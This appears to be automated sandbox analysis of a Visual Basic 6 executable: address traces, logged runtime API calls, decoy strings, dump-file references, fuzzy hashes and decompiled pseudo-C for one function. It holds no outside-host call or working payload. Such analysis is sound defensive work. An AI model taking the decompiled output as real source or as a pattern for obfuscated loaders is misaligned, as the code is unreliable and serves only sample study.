0x004191e0
0x004191fd
0x004191e2
0x004191e2
0x004191e7
0x004191ec
0x004191f1
0x004191f1
0x00419221
0x00419225
0x0041922a
0x00419239
0x0041923c
0x0041923e
0x00419245
0x00419261
0x00419247
0x00419247
0x00419249
0x0041924e
0x00419251
0x00419254
0x00419259
0x00419259
0x0041926d
0x0041927a
0x00419280
0x0041928a
0x00419294
0x004192a2
0x004192bf
0x004192a4
0x004192a4
0x004192a9
0x004192ae
0x004192b3
0x004192b3
0x004192e3
0x004192e7
0x004192ec
0x004192fb
0x00419301
0x00419303
0x0041930a
0x00419329
0x0041930c
0x0041930c
0x00419311
0x00419316
0x00419319
0x0041931c
0x00419321
0x00419321
0x00419335
0x00419342
0x00419348
0x00419354
0x00419371
0x00419356
0x00419356
0x0041935b
0x00419360
0x00419365
0x00419365
0x00419395
0x00419399
0x0041939e
0x004193ad
0x004193b0
0x004193b2
0x004193b9
0x004193d5
0x004193bb
0x004193bb
0x004193bd
0x004193c2
0x004193c5
0x004193c8
0x004193cd
0x004193cd
0x004193e1
0x004193ee
0x004193f4
0x004193fe
0x00419408
0x00419416
0x00419433
0x00419418
0x00419418
0x0041941d
0x00419422
0x00419427
0x00419427
0x00419457
0x0041945b
0x00419460
0x0041946f
0x00419472
0x00419474
0x0041947b
0x00419497
0x0041947d
0x0041947d
0x0041947f
0x00419484
0x00419487
0x0041948a
0x0041948f
0x0041948f
0x004194a3
0x004194b0
0x004194b6
0x004194c2
0x004194df
0x004194c4
0x004194c4
0x004194c9
0x004194ce
0x004194d3
0x004194d3
0x00419503
0x00419507
0x0041950c
0x0041951b
0x00419521
0x00419523
0x0041952a
0x00419549
0x0041952c
0x0041952c
0x00419531
0x00419536
0x00419539
0x0041953c
0x00419541
0x00419541
0x00419550
0x00419552
0x00419554
0x00419557
0x0041955a
0x0041955b
0x00419563
0x00419564
0x0041956e
0x00419578
0x0041957e
0x00419582
0x00419583
0x00419585
0x00419590
0x0041959c
0x004195b9
0x0041959e
0x0041959e
0x004195a3
0x004195a8
0x004195ad
0x004195ad
0x004195dd
0x004195e1
0x004195e6
0x004195f5
0x004195fb
0x004195fd
0x00419604
0x00419623
0x00419606
0x00419606
0x0041960b
0x00419610
0x00419613
0x00419616
0x0041961b
0x0041961b
0x0041962f
0x0041963c
0x00419642
0x0041964c
0x00419656
0x00419664
0x00419681
0x00419666
0x00419666
0x0041966b
0x00419670
0x00419675
0x00419675
0x004196a5
0x004196a9
0x004196ae
0x004196bd
0x004196c0
0x004196c2
0x004196c9
0x004196e5
0x004196cb
0x004196cb
0x004196cd
0x004196d2
0x004196d5
0x004196d8
0x004196dd
0x004196dd
0x004196f1
0x004196fe
0x00419704
0x0041970e
0x00419718
0x00419726
0x00419743
0x00419728
0x00419728
0x0041972d
0x00419732
0x00419737
0x00419737
0x00419767
0x0041976b
0x00419770
0x0041977f
0x00419785
0x00419787
0x0041978e
0x004197ad
0x00419790
0x00419790
0x00419795
0x0041979a
0x0041979d
0x004197a0
0x004197a5
0x004197a5
0x004197b4
0x004197b6
0x004197b8
0x004197bb
0x004197be
0x004197bf
0x004197c7
0x004197c8
0x004197d2
0x004197dc
0x004197e2
0x004197e6
0x004197e7
0x004197e9
0x004197f4
0x004197fe
0x00419808
0x00419816
0x00419833
0x00419818
0x00419818
0x0041981d
0x00419822
0x00419827
0x00419827
0x00419857
0x0041985b
0x00419860
0x0041986f
0x00419875
0x00419877
0x0041987e
0x0041989d
0x00419880
0x00419880
0x00419885
0x0041988a
0x0041988d
0x00419890
0x00419895
0x00419895
0x004198a9
0x004198b6
0x004198bc
0x004198c6
0x004198d0
0x004198dc
0x004198e6
0x004198f4
0x00419911
0x004198f6
0x004198f6
0x004198fb
0x00419900
0x00419905
0x00419905
0x00419935
0x00419939
0x0041993e
0x0041994d
0x00419953
0x00419955
0x0041995c
0x0041997b
0x0041995e
0x0041995e
0x00419963
0x00419968
0x0041996b
0x0041996e
0x00419973
0x00419973
0x00419987
0x00419994
0x0041999a
0x004199a4
0x004199ae
0x004199bc
0x004199d9
0x004199be
0x004199be
0x004199c3
0x004199c8
0x004199cd
0x004199cd
0x004199fd
0x00419a01
0x00419a06
0x00419a15
0x00419a1b
0x00419a1d
0x00419a24
0x00419a43
0x00419a26
0x00419a26
0x00419a2b
0x00419a30
0x00419a33
0x00419a36
0x00419a3b
0x00419a3b
0x00419a4f
0x00419a5c
0x00419a62
0x00419a6e
0x00419a8b
0x00419a70
0x00419a70
0x00419a75
0x00419a7a
0x00419a7f
0x00419a7f
0x00419aaf
0x00419ab3
0x00419ab8
0x00419ac7
0x00419aca
0x00419acc
0x00419ad3
0x00419aef
0x00419ad5
0x00419ad5
0x00419ad7
0x00419adc
0x00419adf
0x00419ae2
0x00419ae7
0x00419ae7
0x00419afb
0x00419b08
0x00419b0e
0x00419b18
0x00419b22
0x00419b30
0x00419b4d
0x00419b32
0x00419b32
0x00419b37
0x00419b3c
0x00419b41
0x00419b41
0x00419b71
0x00419b75
0x00419b7a
0x00419b89
0x00419b8c
0x00419b8e
0x00419b95
0x00419bb1
0x00419b97
0x00419b97
0x00419b99
0x00419b9e
0x00419ba1
0x00419ba4
0x00419ba9
0x00419ba9
0x00419bbd
0x00419bca
0x00419bd0
0x00419bda
0x00419be4
0x00419bf0
0x00419bfa
0x00419c06
0x00419c10
0x00419c1c
0x00419c26
0x00419c34
0x00419c51
0x00419c36
0x00419c36
0x00419c3b
0x00419c40
0x00419c45
0x00419c45
0x00419c75
0x00419c79
0x00419c7e
0x00419c8d
0x00419c90
0x00419c92
0x00419c99
0x00419cb5
0x00419c9b
0x00419c9b
0x00419c9d
0x00419ca2
0x00419ca5
0x00419ca8
0x00419cad
0x00419cad
0x00419cc1
0x00419cce
0x00419cd4
0x00419cde
0x00419ce8
0x00419cf4
0x00419cfe
0x00419d0c
0x00419d29
0x00419d0e
0x00419d0e
0x00419d13
0x00419d18
0x00419d1d
0x00419d1d
0x00419d4d
0x00419d51
0x00419d56
0x00419d65
0x00419d6b
0x00419d6d
0x00419d74
0x00419d93
0x00419d76
0x00419d76
0x00419d7b
0x00419d80
0x00419d83
0x00419d86
0x00419d8b
0x00419d8b
0x00419d9f
0x00419dac
0x00419db2
0x00419dbc
0x00419dc6
0x00419dd4
0x00419df1
0x00419dd6
0x00419dd6
0x00419ddb
0x00419de0
0x00419de5
0x00419de5
0x00419e15
0x00419e19
0x00419e1e
0x00419e2d
0x00419e30
0x00419e32
0x00419e39
0x00419e55
0x00419e3b
0x00419e3b
0x00419e3d
0x00419e42
0x00419e45
0x00419e48
0x00419e4d
0x00419e4d
0x00419e61
0x00419e6e
0x00419e74
0x00419e79
0x00419e80
0x00419e87
0x00419e8c
0x00419e8d
0x00419e97
0x00419e9f
0x00419eab
0x00419ec8
0x00419ead
0x00419ead
0x00419eb2
0x00419eb7
0x00419ebc
0x00419ebc
0x00419eec
0x00419ef0
0x00419ef5
0x00419f04
0x00419f0a
0x00419f0c
0x00419f13
0x00419f32
0x00419f15
0x00419f15
0x00419f1a
0x00419f1f
0x00419f22
0x00419f25
0x00419f2a
0x00419f2a
0x00419f39
0x00419f3c
0x00419f3e
0x00419f40
0x00419f42
0x00419f4a
0x00419f52
0x00419f52
0x00419f57
0x00419f5e
0x00419f95
0x00419f9d
0x00419fa2
0x00419fa5
0x00419fa6
0x00419fa8
0x00419fb0
0x00419fb8
0x00419fc0
0x00419fc5

APIs

__vbaChkstk.MSVBVM60(?,00401576), ref: 00418EE5
__vbaStrCopy.MSVBVM60(?,?,?,?,00401576), ref: 00418EFD
__vbaChkstk.MSVBVM60 ref: 00418F13
#689.MSVBVM60(flyveledere,Regimentsstabes,Prokuraen), ref: 00418F30
__vbaStrMove.MSVBVM60(flyveledere,Regimentsstabes,Prokuraen), ref: 00418F3A
__vbaStrCmp.MSVBVM60(00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418F42
__vbaFreeStr.MSVBVM60(00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418F56
#706.MSVBVM60(00000001,00000000,00000000,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418F6D
__vbaStrMove.MSVBVM60(00000001,00000000,00000000,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418F77
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000001,00000000,00000000,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418F96
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000001,00000000,00000000,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418FA0
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000001,00000000,00000000,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418FA8
#554.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,00000001,00000000,00000000,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418FAD
#613.MSVBVM60(?,00000002,00000002,000000FF,000000FE,000000FE,000000FE,00000001,00000000,00000000,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418FC8
__vbaStrVarMove.MSVBVM60(?,?,00000002,00000002,000000FF,000000FE,000000FE,000000FE,00000001,00000000,00000000,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418FD1
__vbaStrMove.MSVBVM60(?,?,00000002,00000002,000000FF,000000FE,000000FE,000000FE,00000001,00000000,00000000,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00418FDB
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,00000002,000000FF,000000FE,000000FE,000000FE,00000001,00000000,00000000,00000000,00000000), ref: 00418FEA
__vbaNew2.MSVBVM60(004041C8,0043033C), ref: 00419005
__vbaHresultCheckObj.MSVBVM60(00000000,?,004041B8,00000014), ref: 00419052
__vbaHresultCheckObj.MSVBVM60(00000000,?,004041D8,000000C0), ref: 004190A2
__vbaFreeObj.MSVBVM60(00000000,?,004041D8,000000C0), ref: 004190C1
#594.MSVBVM60(0000000A), ref: 004190D8
__vbaFreeVar.MSVBVM60(0000000A), ref: 004190E0
__vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,00000020,00000000,0000000A), ref: 004190F8
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419113
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041914C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000120), ref: 00419181
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004191A0
__vbaI4Var.MSVBVM60(00000000), ref: 004191A9
__vbaFreeObjList.MSVBVM60(00000002,?,00000000,00000000), ref: 004191C9
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 004191D4
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,00000000), ref: 004191EC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419225
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000068), ref: 00419254
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000068), ref: 00419280
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 004192AE
__vbaObjSet.MSVBVM60(?,00000000), ref: 004192E7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E84,00000138), ref: 0041931C
__vbaFreeObj.MSVBVM60(00000000,?,00403E84,00000138), ref: 00419348
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419360
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419399
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403F1C,00000060), ref: 004193C8
__vbaFreeObj.MSVBVM60(00000000,?,00403F1C,00000060), ref: 004193F4
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419422
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041945B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000068), ref: 0041948A
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000068), ref: 004194B6
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 004194CE
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419507
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000120), ref: 0041953C
__vbaLateIdCallLd.MSVBVM60(?,00000000,00000000,00000000), ref: 0041955B
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00000000), ref: 00419564
__vbaFreeObjList.MSVBVM60(00000002,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00419585
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00000000), ref: 00419590
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,00000000,?,?,?,?,?,?,00000000), ref: 004195A8
__vbaObjSet.MSVBVM60(?,00000000), ref: 004195E1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 00419616
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 00419642
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419670
__vbaObjSet.MSVBVM60(?,00000000), ref: 004196A9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000060), ref: 004196D8
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000060), ref: 00419704
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419732
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041976B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000120), ref: 004197A0
__vbaLateIdCallLd.MSVBVM60(?,00000000,00000000,00000000), ref: 004197BF
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 004197C8
__vbaFreeObjList.MSVBVM60(00000002,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 004197E9
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00000000), ref: 004197F4
__vbaNew2.MSVBVM60(0040516C,00430010,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00419822
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041985B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 00419890
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 004198BC
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419900
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419939
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 0041996E
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 0041999A
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 004199C8
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419A01
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 00419A36
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 00419A62
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419A7A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419AB3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000060), ref: 00419AE2
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000060), ref: 00419B0E
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419B3C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419B75
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000068), ref: 00419BA4
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000068), ref: 00419BD0
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419C40
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419C79
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000060), ref: 00419CA8
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000060), ref: 00419CD4
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419D18
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419D51
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 00419D86
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000178), ref: 00419DB2
__vbaNew2.MSVBVM60(0040516C,00430010), ref: 00419DE0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419E19
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000068), ref: 00419E48
__vbaFreeObj.MSVBVM60(00000000,?,00403E40,00000068), ref: 00419E74
#705.MSVBVM60(00000002,00000000), ref: 00419E8D
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 00419E97
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 00419E9F
__vbaNew2.MSVBVM60(0040516C,00430010,00000002,00000000), ref: 00419EB7
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419EF0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E40,00000198), ref: 00419F25
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000006C,?), ref: 00419F42
__vbaFreeStr.MSVBVM60(00000020,000000FF,0000006C,?), ref: 00419F4A
__vbaFreeObj.MSVBVM60(00000020,000000FF,0000006C,?), ref: 00419F52
__vbaFreeStr.MSVBVM60(00419FC6,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00419F95
__vbaFreeStr.MSVBVM60(00419FC6,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00419F9D
__vbaAryDestruct.MSVBVM60(00000000,?,00419FC6,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00419FA8
__vbaFreeStr.MSVBVM60(00000000,?,00419FC6,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00419FB0
__vbaFreeStr.MSVBVM60(00000000,?,00419FC6,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00419FB8
__vbaFreeStr.MSVBVM60(00000000,?,00419FC6,00000000,00000000,flyveledere,Regimentsstabes,Prokuraen), ref: 00419FC0

Strings

Prokuraen, xrefs: 00418F21
flyveledere, xrefs: 00418F2B
FO, xrefs: 00419F57
Regimentsstabes, xrefs: 00418F26

Memory Dump Source

Source File: 00000000.00000002.254091440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.254085568.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254281684.0000000000430000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254289363.0000000000432000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$List$CallLate$Chkstk$#554#594#613#689#703#705#706CopyDestructFileOpenRedim
String ID: FO$Prokuraen$Regimentsstabes$flyveledere
API String ID: 3036984184-4207305509
Opcode ID: 4e483291cf6459347073cc56c754a6a616ee09012c7b5893bc5d496bcb568e59
Instruction ID: cde178f9e36de1effe7bb0f3ed44440789cf259c3cb291324620e087d5507732
Opcode Fuzzy Hash: 4e483291cf6459347073cc56c754a6a616ee09012c7b5893bc5d496bcb568e59
Instruction Fuzzy Hash: 0AC22774900208DFDB24EFA5D855FDDBBB4BF08304F2041AAE515BB2A2CB799985CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00426ED2, Relevance: 72.1, APIs: 40, Strings: 1, Instructions: 374
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00426ED2(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long long* _v28;
				void* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				long long _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v88;
				char _v96;
				intOrPtr _v104;
				char _v112;
				intOrPtr _v120;
				char _v128;
				char* _v136;
				intOrPtr _v144;
				void* _v180;
				signed int _v184;
				void* _v188;
				signed int _v192;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				intOrPtr* _v228;
				signed int _v232;
				signed int _v236;
				intOrPtr* _v240;
				signed int _v244;
				signed int _v248;
				intOrPtr* _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr* _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr* _v276;
				signed int _v280;
				char* _t209;
				signed int _t210;
				signed int _t216;
				signed int _t220;
				signed int _t226;
				signed int _t231;
				signed int _t239;
				signed int _t244;
				signed int _t251;
				signed int _t256;
				char* _t267;
				char* _t289;
				void* _t304;
				long long* _t305;
				intOrPtr _t323;
				long long _t324;

				_t323 = __fp0;
				_t305 = _t304 - 0x18;
				_push(0x401576);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t305;
				L00401570();
				_v28 = _t305;
				_v24 = 0x401460;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				L0040173E();
				_v8 = 2;
				_v136 = L"7/7/7";
				_v144 = 8;
				L00401672();
				_t209 =  &_v96;
				_push(_t209); // executed
				L00401660(); // executed
				_v180 =  ~(0 | _t209 != 0x0000ffff);
				L00401726();
				_t210 = _v180;
				if(_t210 != 0) {
					_v8 = 3;
					L004016F6();
					_v8 = 4;
					if( *0x43033c != 0) {
						_v228 = 0x43033c;
					} else {
						_push(0x43033c);
						_push(0x4041c8);
						L0040175C();
						_v228 = 0x43033c;
					}
					_v180 =  *_v228;
					_t216 =  *((intOrPtr*)( *_v180 + 0x4c))(_v180,  &_v80);
					asm("fclex");
					_v184 = _t216;
					if(_v184 >= 0) {
						_v232 = _v232 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x4041b8);
						_push(_v180);
						_push(_v184);
						L00401756();
						_v232 = _t216;
					}
					_v188 = _v80;
					_t220 =  *((intOrPtr*)( *_v188 + 0x28))(_v188);
					asm("fclex");
					_v192 = _t220;
					if(_v192 >= 0) {
						_v236 = _v236 & 0x00000000;
					} else {
						_push(0x28);
						_push(0x404280);
						_push(_v188);
						_push(_v192);
						L00401756();
						_v236 = _t220;
					}
					L00401750();
					_v8 = 5;
					if( *0x43033c != 0) {
						_v240 = 0x43033c;
					} else {
						_push(0x43033c);
						_push(0x4041c8);
						L0040175C();
						_v240 = 0x43033c;
					}
					_v180 =  *_v240;
					_t226 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v80);
					asm("fclex");
					_v184 = _t226;
					if(_v184 >= 0) {
						_v244 = _v244 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x4041b8);
						_push(_v180);
						_push(_v184);
						L00401756();
						_v244 = _t226;
					}
					_v188 = _v80;
					_t231 =  *((intOrPtr*)( *_v188 + 0x58))(_v188,  &_v76);
					asm("fclex");
					_v192 = _t231;
					if(_v192 >= 0) {
						_v248 = _v248 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x4041d8);
						_push(_v188);
						_push(_v192);
						L00401756();
						_v248 = _t231;
					}
					_v216 = _v76;
					_v76 = _v76 & 0x00000000;
					L00401744();
					L00401750();
					_v8 = 6;
					_push(0xffffffff);
					L0040165A();
					_v8 = 7;
					_v88 = 0x80020004;
					_v96 = 0xa;
					_push( &_v96);
					L00401654();
					_v44 = _t323;
					L00401726();
					_v8 = 8;
					if( *0x43033c != 0) {
						_v252 = 0x43033c;
					} else {
						_push(0x43033c);
						_push(0x4041c8);
						L0040175C();
						_v252 = 0x43033c;
					}
					_v180 =  *_v252;
					_t239 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v80);
					asm("fclex");
					_v184 = _t239;
					if(_v184 >= 0) {
						_v256 = _v256 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x4041b8);
						_push(_v180);
						_push(_v184);
						L00401756();
						_v256 = _t239;
					}
					_v188 = _v80;
					_t244 =  *((intOrPtr*)( *_v188 + 0xe0))(_v188,  &_v76);
					asm("fclex");
					_v192 = _t244;
					if(_v192 >= 0) {
						_v260 = _v260 & 0x00000000;
					} else {
						_push(0xe0);
						_push(0x4041d8);
						_push(_v188);
						_push(_v192);
						L00401756();
						_v260 = _t244;
					}
					_v220 = _v76;
					_v76 = _v76 & 0x00000000;
					L00401744();
					L00401750();
					_v8 = 9;
					if( *0x43033c != 0) {
						_v264 = 0x43033c;
					} else {
						_push(0x43033c);
						_push(0x4041c8);
						L0040175C();
						_v264 = 0x43033c;
					}
					_v180 =  *_v264;
					_t251 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v80);
					asm("fclex");
					_v184 = _t251;
					if(_v184 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x4041b8);
						_push(_v180);
						_push(_v184);
						L00401756();
						_v268 = _t251;
					}
					_v188 = _v80;
					_t256 =  *((intOrPtr*)( *_v188 + 0x110))(_v188,  &_v76);
					asm("fclex");
					_v192 = _t256;
					if(_v192 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x4041d8);
						_push(_v188);
						_push(_v192);
						L00401756();
						_v272 = _t256;
					}
					_v224 = _v76;
					_v76 = _v76 & 0x00000000;
					L00401744();
					_t289 =  &_v80;
					L00401750();
					_v8 = 0xa;
					_v120 = 0x80020004;
					_v128 = 0xa;
					_v104 = 0x80020004;
					_v112 = 0xa;
					_v88 = 0x80020004;
					_v96 = 0xa;
					_push( &_v128);
					_push( &_v112);
					_push( &_v96);
					_t324 =  *0x4014b8;
					_push(_t289);
					_push(_t289);
					 *_t305 = _t324;
					asm("fld1");
					_push(_t289);
					_push(_t289);
					 *_t305 = _t324;
					asm("fld1");
					_push(_t289);
					_push(_t289);
					 *_t305 = _t324;
					L0040164E();
					_v60 = _t324;
					_push( &_v128);
					_push( &_v112);
					_push( &_v96);
					_push(3);
					L004016EA();
					_v8 = 0xb;
					if( *0x430010 != 0) {
						_v276 = 0x430010;
					} else {
						_push(0x430010);
						_push(0x40516c);
						L0040175C();
						_v276 = 0x430010;
					}
					_t267 =  &_v80;
					L00401762();
					_v180 = _t267;
					_t210 =  *((intOrPtr*)( *_v180 + 0x50))(_v180,  &_v76, _t267,  *((intOrPtr*)( *((intOrPtr*)( *_v276)) + 0x344))( *_v276));
					asm("fclex");
					_v184 = _t210;
					if(_v184 >= 0) {
						_v280 = _v280 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x403e40);
						_push(_v180);
						_push(_v184);
						L00401756();
						_v280 = _t210;
					}
					_push(1);
					_push(_v76);
					L004016A2();
					L00401720();
					L00401750();
				}
				_v8 = 0xd;
				_v52 = 0x2f74e0c0;
				_v48 = 0x5afb;
				asm("wait");
				_push(0x42756f);
				L00401720();
				L00401720();
				L00401720();
				L00401720();
				return _t210;
			}

0x00426ed2
0x00426ed5
0x00426ed8
0x00426ee3
0x00426ee4
0x00426ef0
0x00426ef8
0x00426efb
0x00426f02
0x00426f09
0x00426f10
0x00426f1d
0x00426f22
0x00426f29
0x00426f33
0x00426f46
0x00426f4b
0x00426f4e
0x00426f4f
0x00426f5f
0x00426f69
0x00426f6e
0x00426f77
0x00426f7d
0x00426f84
0x00426f89
0x00426f97
0x00426fb4
0x00426f99
0x00426f99
0x00426f9e
0x00426fa3
0x00426fa8
0x00426fa8
0x00426fc6
0x00426fde
0x00426fe1
0x00426fe3
0x00426ff0
0x00427012
0x00426ff2
0x00426ff2
0x00426ff4
0x00426ff9
0x00426fff
0x00427005
0x0042700a
0x0042700a
0x0042701c
0x00427030
0x00427033
0x00427035
0x00427042
0x00427064
0x00427044
0x00427044
0x00427046
0x0042704b
0x00427051
0x00427057
0x0042705c
0x0042705c
0x0042706e
0x00427073
0x00427081
0x0042709e
0x00427083
0x00427083
0x00427088
0x0042708d
0x00427092
0x00427092
0x004270b0
0x004270c8
0x004270cb
0x004270cd
0x004270da
0x004270fc
0x004270dc
0x004270dc
0x004270de
0x004270e3
0x004270e9
0x004270ef
0x004270f4
0x004270f4
0x00427106
0x0042711e
0x00427121
0x00427123
0x00427130
0x00427152
0x00427132
0x00427132
0x00427134
0x00427139
0x0042713f
0x00427145
0x0042714a
0x0042714a
0x0042715c
0x00427162
0x0042716f
0x00427177
0x0042717c
0x00427183
0x00427185
0x0042718a
0x00427191
0x00427198
0x004271a2
0x004271a3
0x004271a8
0x004271ae
0x004271b3
0x004271c1
0x004271de
0x004271c3
0x004271c3
0x004271c8
0x004271cd
0x004271d2
0x004271d2
0x004271f0
0x00427208
0x0042720b
0x0042720d
0x0042721a
0x0042723c
0x0042721c
0x0042721c
0x0042721e
0x00427223
0x00427229
0x0042722f
0x00427234
0x00427234
0x00427246
0x0042725e
0x00427264
0x00427266
0x00427273
0x00427298
0x00427275
0x00427275
0x0042727a
0x0042727f
0x00427285
0x0042728b
0x00427290
0x00427290
0x004272a2
0x004272a8
0x004272b5
0x004272bd
0x004272c2
0x004272d0
0x004272ed
0x004272d2
0x004272d2
0x004272d7
0x004272dc
0x004272e1
0x004272e1
0x004272ff
0x00427317
0x0042731a
0x0042731c
0x00427329
0x0042734b
0x0042732b
0x0042732b
0x0042732d
0x00427332
0x00427338
0x0042733e
0x00427343
0x00427343
0x00427355
0x0042736d
0x00427373
0x00427375
0x00427382
0x004273a7
0x00427384
0x00427384
0x00427389
0x0042738e
0x00427394
0x0042739a
0x0042739f
0x0042739f
0x004273b1
0x004273b7
0x004273c4
0x004273c9
0x004273cc
0x004273d1
0x004273d8
0x004273df
0x004273e6
0x004273ed
0x004273f4
0x004273fb
0x00427405
0x00427409
0x0042740d
0x0042740e
0x00427414
0x00427415
0x00427416
0x00427419
0x0042741b
0x0042741c
0x0042741d
0x00427420
0x00427422
0x00427423
0x00427424
0x00427427
0x0042742c
0x00427432
0x00427436
0x0042743a
0x0042743b
0x0042743d
0x00427445
0x00427453
0x00427470
0x00427455
0x00427455
0x0042745a
0x0042745f
0x00427464
0x00427464
0x00427494
